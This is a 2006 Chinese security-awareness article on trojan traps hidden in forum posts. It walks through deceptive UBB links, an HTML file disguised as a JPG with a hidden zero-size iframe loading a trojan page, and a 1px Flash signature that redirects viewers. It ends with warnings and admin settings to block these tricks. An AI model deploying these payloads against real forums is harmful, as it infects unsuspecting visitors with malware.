“挖”出论坛帖子中暗藏的陷阱

文章出处：网络收集 作者：　发布时间：2006-10-08 收藏到QQ书签

　　小李平时很喜欢泡论坛，这天他到自己常去的一个论坛回帖之后，电脑莫名其妙地重启，重新开机之后感觉系统变得很慢。莫非帖子中暗藏机关？小李更新杀毒软件的病毒库后一查，果然自己的系统中了木马……

　　论坛往往是一个网站中人气最旺的地方，但很少有人注意到论坛给浏览者带来的安全问题，而像小李这样的遭遇却是真实存在的！下面我们就为大家“挖”出论坛帖子中暗藏的害人陷阱。


　　浏览帖子有隐忧


　　现在很多论坛程序在开发时，会添加一些扩展功能，例如：可以在帖子中引用UBB标签，可以在帖子中隐藏网页真实地址，可以在个人签名中加入特殊效果等。


　　这些功能虽然方便了浏览者，但同时也带来很多安全隐患。恶意攻击者可能借助这些功能，使用网页木马等攻击浏览者的系统。我们在这里模拟攻击者，为大家揭露这些攻击手法。


　　制造“陷阱”


　　选择任一功能稍微强大的论坛（例如动网，它在国内非常流行，而且所带的扩展功能非常多）下手。


　　先利用网页木马生成器制作木马网页，它利用的是IE浏览器漏洞。打开网页木马生成器，单击 “选择”按钮，然后选择木马程序mm.exe，生成2个文件：mm.chm和mm.html（图1）。将这两个文件以及木马程序mm.exe上传到网站空间中，就可以得到一个木马网页，地址以mm.html结尾，例如：http://www.***.com/mm.html）。

图1 利用网页木马生成器生成木马网页


　　接下来就是利用论坛的一些扩展功能暗布“陷阱”，使浏览者在无意间打开帖子时中招。

　　使用陷阱

　　1.陷阱一：文字诱骗

　　通过帖子中的文字诱骗你单击木马网页链接，这是论坛帖子中最常见的“陷阱”。

　　攻击者进入准备下手的论坛，申请账号，然后到其中任一版块发表帖子。帖子内容一般是带有诱惑性的信息：

　　[url= http://www.***.com/mm.html]这里有最新最热的游戏资料和demo下载，赶快进来吧！[/url]
输入完毕之后，发表帖子。


　　小提示：这里发表帖子使用的“[url] [/url]”标签是动网论坛的内置标签，可以起到链接的作用，其他论坛也有使用此标签的。
　　

　　当你浏览这个帖子时，会发现帖子中只显示了文本内容：


　　这里有最新最热的游戏资料和demo下载，赶快进来吧！


　　一般不清楚的人都会好奇地打开查看，从而打开了木马网页http://www.***.com/mm.html，使自己的系统被种植了木马。


　　其实只要把鼠标指针放到文字上，就会在IE浏览器的左下角显示这个链接的真实地址http://www.***.com/mm.html（图2）。

　　图2 碰到这样的帖子，可得多个心眼

　　如果你遇到了这样富有诱惑力的帖子，千万不要贸然地打开查看，因为里面可能隐藏的就是木马网页。

　　2.陷阱二：图片诱骗


　　在帖子中显示一张很大的图片，你为了观看全貌，就对图片进行点击，选择在新窗口中打开查看。这样就会打开木马网页，而你看到的仍然是图片。


　　攻击者首先准备一张超宽的图片（超过帖子页面限制），命名为“022.jpg”（此处文件名“022.jpg”中的“0”是阿拉伯数字），将其上传到网站空间得到地址：http://www.***.com/022.jpg，再将以下代码保存在记事本中：


　　＜img aligh=middle src="022.jpg"＞＜iframe src="http://www.***.com/mm.html" name="zhu" width="0" height="0" frameborder="0"＞＜br＞

　　保存文件名为：O22.jpg（此处文件名“O22.jpg”中的“O”是大写字母）。


　　将含有代码的O22.jpg文件上传到网站空间图片文件022.jpg的同一路径下，得到地址：http://www.***.com/O22.jpg，这样就得到了一个图片木马的地址。


　　小提示：虽然将htm文件的后缀名改为jpg，但是在打开的时候，浏览器仍然会以网页的形式打开，这样就运行了其中的代码，而其中的代码则是链接到木马网页地址http://www.***.com/mm.html，从而使你的系统中木马。
进入论坛，在帖子中输入如下代码（图3）：


　　[url=http://www.***.com/022.jpg][img]http:// http://www.***.com /O22.jpg[/img][/url]
这行代码的含义是使帖子中显示一张图片，图片为http://www.***.com/022.jpg，而其链接到的地址是http://www.***.com/O22.jpg（木马网页的地址）。

　　图3 这段代码中暗藏玄机

　　 这样帖子显示的是一幅图片022.jpg，由于图片022.jpg非常宽，所以帖子中只显示了部分图片，而你为了看到图片的全貌，必然点击图片，想在新窗口中打开图片，这样就打开了木马网页http://www.***.com/O22.jpg。虽然后台打开了木马网页，但是图片仍然正常显示，因为O22.jpg中包含了一句代码：＜img aligh=middle src="022.jpg"＞，即表面上仍然显示022.jpg图片文件。

　　3.陷阱三：动画签名诱骗


　　个人签名是论坛的特色，如果论坛在默认情况下允许使用Flash动画作为论坛签名，攻击者完全可以构造一个存在恶意功能的Flash动画作为论坛签名，从而实现木马网页的大面积传播。下面就为大家揭示这种攻击手法。


　　Flash MX有一个功能叫“get url”，它能够在你欣赏Flash动画时自动跳转到“get url”中设置的URL地址，从而打开新的网站地址。攻击者完全可以利用“get url”功能制作Flash动画，使你在访问时自动跳转到一些恶意网页（例如木马网页）。


　　首先，打开Flash MX，单击工具栏中的“修改”，打开“修改文档属性”面板，设置Flash的尺寸，将其宽和高都设为1px，其余的选项保持不变。之所以将宽和高都设为1px，是因为px值越小，Flash动画下载得越快。


　　其次，在动画文档下方的“动作”栏进行设置，先选择“actions”，然后选择其中的“getURL”动作，双击它，出现设置该动作的面板（图4）。在其中的URL项目中填写要跳转的地址，窗口选择“_blank”（打开一个新窗口显示URL）。


　　最后，在“getURL”中填写一些恶性网站的地址，例如木马网页地址http://www.***.com/mm.html。

　　图4 生成恶意Falsh动画

　　设置好之后，单击工具栏的“文件”→“输出”，生成动画，然后将这个动画上传到网站空间中，得到地址：http://www.***.com/test.swf。


　　步骤3：进入论坛修改注册账号的个人签名，加入以下代码：
[swf] http://www.***.com/test.swf[/swf]


　　提交修改资料，就获得了一个恶意的论坛Falsh签名（图5）。你一旦打开带有这种签名的帖子，恶意Flash文件就会悄悄运行，并打开木马网页，使你的系统在毫无察觉的情况下中木马。

　　图5 生成恶意论坛签名

　　论坛的扩展功能造成的“陷阱”就为大家介绍到这里，大家在浏览帖子的时候需要加倍小心。

　　编后：如果你是一个论坛的管理员，当看到恶意攻击者在你的论坛发布恶意帖子，应该怎么办呢？以动网论坛为例，进入论坛的管理后台，依次进入“论坛管理”→“管理”→“高级设置”中，将“帖子相关设置”中的HTML代码解析，UBB代码解析等功能关闭掉（图6）。再进入“论坛常规设置”中，将“用户选项”中的用户签名是否开启UBB代码，用户是否开启Flash标签等功能关闭，这样就杜绝了攻击者利用这种诱骗的手法来到论坛捣乱。